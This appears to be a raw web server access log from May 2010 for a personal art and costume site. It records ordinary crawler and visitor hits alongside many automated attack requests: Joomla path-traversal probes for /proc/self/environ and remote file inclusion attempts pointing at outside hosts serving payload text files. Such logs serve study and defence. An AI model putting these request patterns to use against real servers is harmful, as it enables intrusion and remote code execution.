208.100.59.16 - - [27/May/2010:20:48:36 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
84.40.30.37 - - [27/May/2010:20:48:36 -0500] "GET //skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
84.40.30.37 - - [27/May/2010:20:48:36 -0500] "GET /logs//skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
84.40.30.37 - - [27/May/2010:20:48:36 -0500] "GET /logs/access_log.1271548800//skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
84.40.30.37 - - [27/May/2010:20:49:35 -0500] "GET /logs//skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
84.40.30.37 - - [27/May/2010:20:49:35 -0500] "GET //skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
84.40.30.37 - - [27/May/2010:20:49:35 -0500] "GET /logs/access_log.1271548800//skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.195.112.180 - - [27/May/2010:20:50:58 -0500] "GET /artwork/dioramas.htm HTTP/1.0" 200 1230 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.144 - - [27/May/2010:20:53:57 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.144 - - [27/May/2010:20:53:57 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.144 - - [27/May/2010:20:53:57 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.122.52.80 - - [27/May/2010:20:54:36 -0500] "GET /xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:54:36 -0500] "GET /logs/access_log.1271376000/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:54:36 -0500] "GET /logs/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:54:36 -0500] "GET /logs/access_log.1272240000/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:54:38 -0500] "GET /xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:54:38 -0500] "GET /logs/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:54:38 -0500] "GET /logs/access_log.1271376000/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:54:38 -0500] "GET /logs/access_log.1272240000/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:55:05 -0500] "GET /xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:55:05 -0500] "GET /logs/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:55:06 -0500] "GET /logs/access_log.1273363200%20%20/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:55:06 -0500] "GET /xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:55:06 -0500] "GET /logs/access_log.1273363200%20%20/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:55:06 -0500] "GET /logs/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:55:08 -0500] "GET /xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:55:08 -0500] "GET /logs/access_log.1273363200%20%20/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:55:08 -0500] "GET /logs/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:55:14 -0500] "GET /xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:55:15 -0500] "GET /logs/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:55:15 -0500] "GET /logs/access_log.1271376000/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:55:16 -0500] "GET /logs/access_log.1272240000/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:56:23 -0500] "GET /xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:56:23 -0500] "GET /logs/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:56:23 -0500] "GET /logs/access_log.1273363200/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:56:30 -0500] "GET /logs/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:56:30 -0500] "GET /xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:56:30 -0500] "GET /logs/access_log.1273363200/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:56:37 -0500] "GET /xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:56:37 -0500] "GET /logs/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:20:56:37 -0500] "GET /logs/access_log.1273363200/xGB.php?act=admin&do=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
87.250.255.243 - - [27/May/2010:20:57:19 -0500] "GET /logs/access_log.1187913600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.23.211.138 - - [27/May/2010:20:58:00 -0500] "GET /logs/access_log.1248652800 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
211.174.62.150 - - [27/May/2010:21:00:54 -0500] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
211.174.62.150 - - [27/May/2010:21:00:54 -0500] "GET /logs/access_log.1271548800//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
211.174.62.150 - - [27/May/2010:21:00:54 -0500] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
207.46.13.99 - - [27/May/2010:21:01:02 -0500] "GET /logs/?N=D HTTP/1.1" 200 7289 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
75.125.131.10 - - [27/May/2010:21:01:14 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
75.125.131.10 - - [27/May/2010:21:01:15 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
211.174.62.150 - - [27/May/2010:21:04:18 -0500] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.174.62.150 - - [27/May/2010:21:04:18 -0500] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
211.174.62.150 - - [27/May/2010:21:04:19 -0500] "GET /logs/access_log.1271548800//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
199.231.58.31 - - [27/May/2010:21:05:18 -0500] "GET /logs/?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7289 "-""libwww-perl/5.831"
199.231.58.31 - - [27/May/2010:21:05:18 -0500] "GET /?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
174.120.226.220 - - [27/May/2010:21:10:27 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
174.120.226.220 - - [27/May/2010:21:10:27 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
80.233.172.42 - - [27/May/2010:21:10:54 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
80.233.172.42 - - [27/May/2010:21:10:54 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
75.125.131.10 - - [27/May/2010:21:11:01 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
75.125.131.10 - - [27/May/2010:21:11:01 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
75.125.131.10 - - [27/May/2010:21:11:01 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
87.250.255.243 - - [27/May/2010:21:11:15 -0500] "GET /logs/access_log.1236297600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
75.125.131.10 - - [27/May/2010:21:11:19 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
75.125.131.10 - - [27/May/2010:21:11:19 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
75.125.131.10 - - [27/May/2010:21:11:19 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
192.167.114.31 - - [27/May/2010:21:11:37 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.820"
192.167.114.31 - - [27/May/2010:21:11:37 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.820"
192.167.114.31 - - [27/May/2010:21:11:38 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.820"
192.167.114.31 - - [27/May/2010:21:11:38 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.820"
75.125.131.10 - - [27/May/2010:21:11:56 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
75.125.131.10 - - [27/May/2010:21:12:16 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
207.46.13.47 - - [27/May/2010:21:14:59 -0500] "GET /logs/access_log.1219968000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.240 - - [27/May/2010:21:16:28 -0500] "GET /artwork/hospitals.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.52 - - [27/May/2010:21:16:59 -0500] "GET /logs/access_log.1177804800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [27/May/2010:21:25:45 -0500] "GET /logs/access_log.1268438400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
204.93.174.47 - - [27/May/2010:21:33:40 -0500] "GET /logs/access_log.1272412800/setup.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
204.93.174.47 - - [27/May/2010:21:33:40 -0500] "GET /logs/setup.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
204.93.174.47 - - [27/May/2010:21:33:40 -0500] "GET /setup.php?dir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
67.195.112.180 - - [27/May/2010:21:33:43 -0500] "GET /logs/access_log.1231804800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.240 - - [27/May/2010:21:36:28 -0500] "GET /logs/access_log.1225584000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [27/May/2010:21:38:54 -0500] "GET /artwork/flagart.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.243 - - [27/May/2010:21:43:59 -0500] "GET /logs/access_log.1166745600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.93.240.45 - - [27/May/2010:21:47:38 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.45 - - [27/May/2010:21:47:38 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.45 - - [27/May/2010:21:47:38 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.45 - - [27/May/2010:21:47:38 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
94.124.120.23 - - [27/May/2010:21:48:05 -0500] "GET /logs//index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.76"
94.124.120.23 - - [27/May/2010:21:48:06 -0500] "GET //index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
193.164.131.82 - - [27/May/2010:21:48:11 -0500] "GET /logs//index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.164.131.82 - - [27/May/2010:21:48:12 -0500] "GET //index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.46.195.241 - - [27/May/2010:21:48:29 -0500] "GET /logs/access_log.1167955200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [27/May/2010:21:48:46 -0500] "GET /logs/access_log.1220832000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
190.49.5.180 - - [27/May/2010:21:51:57 -0500] "GET / HTTP/1.1" 200 1003 "http://proyectosdosanton.blogspot.com/2008/12/dragones-de-eckidd.html""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
190.49.5.180 - - [27/May/2010:21:51:57 -0500] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://tomdolan.pconline.com/""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
190.49.5.180 - - [27/May/2010:21:51:57 -0500] "GET /icons/back.gif HTTP/1.1" 200 216 "http://tomdolan.pconline.com/""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
190.49.5.180 - - [27/May/2010:21:51:57 -0500] "GET /icons/folder.gif HTTP/1.1" 200 225 "http://tomdolan.pconline.com/""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
190.49.5.180 - - [27/May/2010:21:52:05 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "http://tomdolan.pconline.com/""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
190.49.5.180 - - [27/May/2010:21:52:15 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://tomdolan.pconline.com/tattoo/""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
190.49.5.180 - - [27/May/2010:21:52:15 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
190.49.5.180 - - [27/May/2010:21:52:35 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
190.49.5.180 - - [27/May/2010:21:52:35 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
190.49.5.180 - - [27/May/2010:21:52:35 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
190.49.5.180 - - [27/May/2010:21:52:36 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
190.49.5.180 - - [27/May/2010:21:52:36 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
190.49.5.180 - - [27/May/2010:21:52:36 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
190.49.5.180 - - [27/May/2010:21:52:36 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
190.49.5.180 - - [27/May/2010:21:52:36 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
190.49.5.180 - - [27/May/2010:21:52:38 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
190.49.5.180 - - [27/May/2010:21:52:39 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
190.49.5.180 - - [27/May/2010:21:52:39 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
64.91.250.11 - - [27/May/2010:21:54:07 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
64.91.250.11 - - [27/May/2010:21:54:07 -0500] "GET /logs/access_log.1271548800////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
64.91.250.11 - - [27/May/2010:21:54:07 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 7296 "-""Mozilla/5.0"
64.91.250.11 - - [27/May/2010:21:54:51 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
64.91.250.11 - - [27/May/2010:21:54:51 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 7296 "-""Mozilla/5.0"
64.91.250.11 - - [27/May/2010:21:54:51 -0500] "GET /logs/access_log.1271548800////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
94.124.120.23 - - [27/May/2010:21:55:17 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.76"
94.124.120.23 - - [27/May/2010:21:55:17 -0500] "GET //index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
94.124.120.23 - - [27/May/2010:21:55:18 -0500] "GET /logs//index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.76"
193.164.131.82 - - [27/May/2010:21:56:40 -0500] "GET /logs/access_log.1273017600//index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.164.131.82 - - [27/May/2010:21:56:41 -0500] "GET //index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.164.131.82 - - [27/May/2010:21:56:41 -0500] "GET /logs//index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.195.112.180 - - [27/May/2010:21:59:54 -0500] "GET /logs/access_log.1212451200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
